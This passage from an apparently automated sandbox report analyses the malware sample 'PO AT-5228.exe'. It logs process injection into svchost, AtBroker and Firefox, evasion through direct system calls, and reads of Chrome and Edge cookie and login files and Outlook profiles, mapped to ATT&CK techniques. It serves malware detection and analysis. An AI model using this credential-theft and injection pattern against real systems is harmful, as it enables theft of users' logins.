                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02EBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC69C0 mov eax, dword ptr fs:[00000030h]1_2_02EC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E649D0 mov eax, dword ptr fs:[00000030h]1_2_02E649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02EFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov esi, dword ptr fs:[00000030h]1_2_02EB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov edx, dword ptr fs:[00000030h]1_2_02E7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B9A66C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B881AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B881AC
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B88189 SetUnhandledExceptionFilter,0_2_00B88189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeThread register set: target process: 7744Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeThread APC queued: target process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeJump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30C008Jump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9B106 LogonUserW,0_2_00B9B106
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63D19
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA411C SendInput,keybd_event,0_2_00BA411C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA74BB mouse_event,0_2_00BA74BB
                Source: C:\Users\user\Desktop\PO AT-5228.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO AT-5228.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B9A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B9A66C
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BA71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BA71FA
                Source: PO AT-5228.exe, BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: PO AT-5228.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: BLUymyzgBTyhbo.exe, 00000002.00000000.1704742829.00000000013D0000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3525110195.00000000013D1000.00000002.00000001.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525417060.0000000001921000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B865C4 cpuid 0_2_00B865C4
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00BB091D
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BDB340 GetUserNameW,0_2_00BDB340
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B91E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00B91E8E
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B7DDC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: PO AT-5228.exeBinary or memory string: WIN_81
                Source: PO AT-5228.exeBinary or memory string: WIN_XP
                Source: PO AT-5228.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: PO AT-5228.exeBinary or memory string: WIN_XPe
                Source: PO AT-5228.exeBinary or memory string: WIN_VISTA
                Source: PO AT-5228.exeBinary or memory string: WIN_7
                Source: PO AT-5228.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.440000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3527019353.0000000005710000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781295730.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524540674.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3525547305.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781112261.0000000000440000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1781559228.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3525581336.0000000005270000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3524288505.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00BB8C4F
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00BB923B
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                3
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
